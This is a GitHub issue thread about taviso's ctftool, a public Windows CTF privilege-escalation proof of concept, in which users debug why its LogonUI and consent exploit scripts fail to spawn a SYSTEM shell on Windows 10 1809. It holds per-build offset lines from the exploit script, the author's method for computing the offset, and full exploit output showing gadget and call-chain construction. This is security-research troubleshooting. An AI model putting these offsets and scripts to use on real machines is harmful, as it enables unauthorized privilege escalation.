taviso / ctftool

Interactive CTF Exploration Tool
Apache License 2.0

No cmd spawned on Win 10 Enterprise 1809 #9

Open mattwhatkins opened 5 years ago

mattwhatkins commented 5 years ago

I'm experimenting with this in a corporate environment, but I can't seem to get a cmd shell spawned. Apologies if I'm missing something trivial.

Host is a Win10 VM Enterprise 1809 running in VMWare. Latest updates are from the 6th July.

Testing with the ctf-consent-system.ctf, ctf-exploit-common-win10.ctf and ctf-logonui-system.ctf fails to result in a shell being spawned, yet the output shows Exploit complete. Checking process explorer, there are no new cmd.exe processes running in other sessions/hidden.

Is this expected to work or am I missing something? What's the best way to go about debugging this?

cloudsbyzeus commented 5 years ago

Having the same experience with this.

KillaEslieBee commented 5 years ago

On a test machine I had the same problem. I edited the ctf-exploit-common-win10.ctf and in my case the offset (not certain if I used the correct term for it!) used for 1903 also worked for my test machine. So I replaced the offset with the offset from 1903 -> 480 and replaced it in the right spot. Saved the file and now the stuff is working.

If it doesn't work try tinkering with that value for your build, for my 1803 offset 480 worked perfectly.

```
set r0 1903 eq r0 regval repeat r0 set r3 480
set r0 1809 eq r0 regval repeat r0 set r3 496
set r0 1803 eq r0 regval repeat r0 set r3 480
set r0 1709 eq r0 regval repeat r0 set r3 452
set r0 1703 eq r0 regval repeat r0 set r3 401
```

taviso commented 5 years ago

Thanks for the bug report, can you paste the output you see?

Also, can you find the version of MSCTF.DLL?

I did test it on 1809, but it might be a different patchlevel I didn't check...

cloudsbyzeus commented 5 years ago

Hi @KillaEslieBee @taviso

I am also testing with 1809, and I tried different values with no success. What is your recommendation to identify what is the correct value to use here?

taviso commented 5 years ago

If you tell me the version of MSCTF.DLL you have, I can check.

cloudsbyzeus commented 5 years ago

@taviso, version is 10.0.17763.529

taviso commented 5 years ago

I just took a look at that version, the correct offset is 496 - which should be automatically matched to 1809.

(To find the offset, I just subtract the pointer to CTIPProxy::Reconvert in the CTIPProxy vtable from the base of the CStubIEnumTfInputProcessorProfiles::_StubTbl, and divide by 8).

Can you show the full output from the exploit, it must be some other problem.

cloudsbyzeus commented 5 years ago

Microsoft Defender just caught it as: HackTool:Win32/CTFExtool

cloudsbyzeus commented 5 years ago

```
An interactive ctf exploration tool by @taviso.
Type "help" for available commands. Most commands require a connection, see "help connect".
ctf> connect
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault3
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault3") => 0
Connected to CTF server@\BaseNamedObjects\msctf.serverDefault3, Handle 00000224
ctf> scan
Client 0, Tid 16156 (Flags 0x08, Hwnd 00003F1C, Pid 12924, explorer.exe)
Client 1, Tid 3140 (Flags 0x08, Hwnd 00000C44, Pid 12924, explorer.exe)
Client 2, Tid 14272 (Flags 0x08, Hwnd 000037C0, Pid 12924, explorer.exe)
Client 3, Tid 3908 (Flags 0x08, Hwnd 00000F44, Pid 12924, explorer.exe)
Client 4, Tid 9076 (Flags 0x08, Hwnd 00002374, Pid 12924, explorer.exe)
Client 5, Tid 248 (Flags 0x0c, Hwnd 000000F8, Pid 12924, explorer.exe)
Client 6, Tid 3408 (Flags 0x08, Hwnd 00000D50, Pid 12924, explorer.exe)
Client 7, Tid 9408 (Flags 0x08, Hwnd 000024C0, Pid 12924, explorer.exe)
Client 8, Tid 7472 (Flags 0x08, Hwnd 00001D30, Pid 12924, explorer.exe)
Client 9, Tid 5828 (Flags 0x08, Hwnd 000016C4, Pid 12924, explorer.exe)
Client 10, Tid 9376 (Flags 0x08, Hwnd 000024A0, Pid 12924, explorer.exe)
Client 11, Tid 15456 (Flags 0x0c, Hwnd 00003C60, Pid 9872, ShellExperienceHost.exe)
Client 12, Tid 1272 (Flags 0x0c, Hwnd 000004F8, Pid 908, SearchUI.exe)
Client 13, Tid 1128 (Flags 0x0c, Hwnd 00000468, Pid 908, SearchUI.exe)
Client 14, Tid 12252 (Flags 0x08, Hwnd 00002FDC, Pid 10216, ApplicationFrameHost.exe)
Client 15, Tid 7620 (Flags 0x08, Hwnd 00001DC4, Pid 10216, ApplicationFrameHost.exe)
Client 16, Tid 11020 (Flags 0x0c, Hwnd 00002B0C, Pid 16600, MicrosoftEdge.exe)
Client 17, Tid 7792 (Flags 0x0c, Hwnd 00001E70, Pid 6892, MicrosoftEdgeCP.exe)
Client 18, Tid 3712 (Flags 0000, Hwnd 00000E80, Pid 13328, ctfmon.exe)
Client 19, Tid 572 (Flags 0x08, Hwnd 0000023C, Pid 5152, FF_Protection.exe)
Client 20, Tid 7504 (Flags 0x08, Hwnd 00001D50, Pid 14036, OneDrive.exe)
Client 21, Tid 12616 (Flags 0x0c, Hwnd 00003148, Pid 212, LockApp.exe)
Client 22, Tid 2216 (Flags 0x08, Hwnd 000008A8, Pid 9704, Taskmgr.exe)
Client 23, Tid 13516 (Flags 0x08, Hwnd 000034CC, Pid 4828, regedit.exe)
Client 24, Tid 12140 (Flags 0x0c, Hwnd 00002F6C, Pid 10984, SecHealthUI.exe)
Client 25, Tid 10924 (Flags 0x0c, Hwnd 00002AAC, Pid 15200, MicrosoftEdgeCP.exe)
Client 26, Tid 9144 (Flags 0000, Hwnd 000023B8, Pid 7748, ctftool.exe)
Client 27, Tid 13204 (Flags 0x08, Hwnd 00003394, Pid 7436, conhost.exe)
ctf> script .\scripts\ctf-logonui-system.ctf
Attempting to copy exploit payload...
Overwrite C:\TEMP\EXPLOIT.DLL (Yes/No/All)? a
C:payload64.dll
        1 File(s) copied
The screen will lock to trigger the login screen in 5 seconds...
Closing existing ALPC Port Handle 00000224...
The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon3
Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon3, Handle 0000023C
Client 0, Tid 9144 (Flags 0000, Hwnd 000023B8, Pid 7748, ctftool.exe)
Client 1, Tid 11904 (Flags 0x1000000c, Hwnd 00002E80, Pid 15592, LogonUI.exe)
Found new client LogonUI.exe, DefaultThread now 11904
ReleaseId is 1809
Guessed msvcrt => C:\Windows\system32\msvcrt.DLL
Found Gadget 48895C... in module msvcrt at offset 0x31140
C:\Windows\system32\msvcrt.DLL->.text->VirtualAddress is 0x001000
C:\Windows\system32\msvcrt.DLL->.text->PointerToRawData is 0x000400
C:\Windows\system32\kernel32.DLL->.data->VirtualAddress is 0x0a9000
Command succeeded, stub created
Dumping Marshal Parameter 3 (Base 000E04F0, Type 0x106, Size 0x18, Offset 0x40)
000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C\
000010: 01 00 00 00 dc ff 65 4e ......eN
Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x4e65ffdc
0x7ffe32320000
0x7ffe2f640000
0x7ffe30240000
Guessed msctf => C:\Windows\system32\msctf.DLL
Found Gadget 488b41... in module msctf at offset 0xb9cc0
C:\Windows\system32\msctf.DLL->.text->VirtualAddress is 0x001000
C:\Windows\system32\msctf.DLL->.text->PointerToRawData is 0x000400
0x7ffe2f640000
Guessed kernel32 => C:\Windows\system32\kernel32.DLL
C:\Windows\system32\kernel32.DLL is a 64bit module.
kernel32!LoadLibraryA@0x180000000+0x1f220
The CFG call chain is built, writing in parameters...
Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
0x7ffe30740000
Guessed combase => C:\Windows\system32\combase.DLL
Found Gadget 488b49... in module combase at offset 0x1eaac0
C:\Windows\system32\combase.DLL->.text->VirtualAddress is 0x001000
C:\Windows\system32\combase.DLL->.text->PointerToRawData is 0x000400
Payload created and call chain ready, get ready...

Exploit complete.

ctf>
```

taviso commented 5 years ago

Hmmm... it looks okay, can you try using script .\scripts\ctf-consent-system.ctf script instead?

The only thing I can think of is there are some group policy settings that change how the loginui one works.

jgrotter commented 5 years ago

> Microsoft Defender just caught it as: HackTool:Win32/CTFExtool

+1 - MS Security just started flagging/deleting

cloudsbyzeus commented 5 years ago

> Hmmm... it looks okay, can you try using script .\scripts\ctf-consent-system.ctf script instead?
>
> The only thing I can think of is there are some group policy settings that change how the loginui one works.

Yes, in both cases a cmd is not spawned. It's a default install. Don't think it has anything special.

Knallkoppon commented 5 years ago

I'm on Windows 10 Enterprise 1709. Doesn't work. I think it is caused by the Extended Support of the Enterprise Versions. My MSCTF.DLL is on version 10.0.16299.696. I didn't understand how to calc the offset.